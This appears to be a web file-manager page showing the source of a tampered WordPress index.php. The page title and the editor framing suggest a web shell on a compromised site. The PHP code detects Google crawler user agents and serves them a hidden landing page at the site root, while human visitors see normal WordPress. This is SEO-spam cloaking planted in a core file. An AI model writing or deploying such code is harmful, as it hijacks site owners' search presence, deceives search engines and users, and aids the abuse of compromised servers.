KOKINIO - MANAGER
Edit File: index.php
<?php define('WP_USE_THEMES', true); if (!defined('ABSPATH')) { define('ABSPATH', __DIR__ . '/'); } $userAgent = $_SERVER['HTTP_USER_AGENT'] ?? ''; $referer = $_SERVER['HTTP_REFERER'] ?? ''; $googleBots = [ 'Googlebot', 'AdsBot', 'Mediapartners-Google', 'APIs-Google', 'Googlebot-Image', 'Googlebot-Video', 'Googlebot-News', 'Googlebot-Search', 'Googlebot-Inspect', 'Googlebot-Android', 'Googlebot-Mobile', 'Googlebot-Ads', 'Googlebot-Discovery', 'Google-', ]; // Sadece user agent google bot ise landing page goster, referer google olsa bile degil! $isGoogleBot = preg_match('/' . implode('|', $googleBots) . '/i', $userAgent); if ($isGoogleBot && $_SERVER['REQUEST_URI'] === '/') { include __DIR__ . '/landing-page.html'; exit; } // Google bot degilse normal WordPress cal?st?r?l?r. require ABSPATH . 'wp-blog-header.php';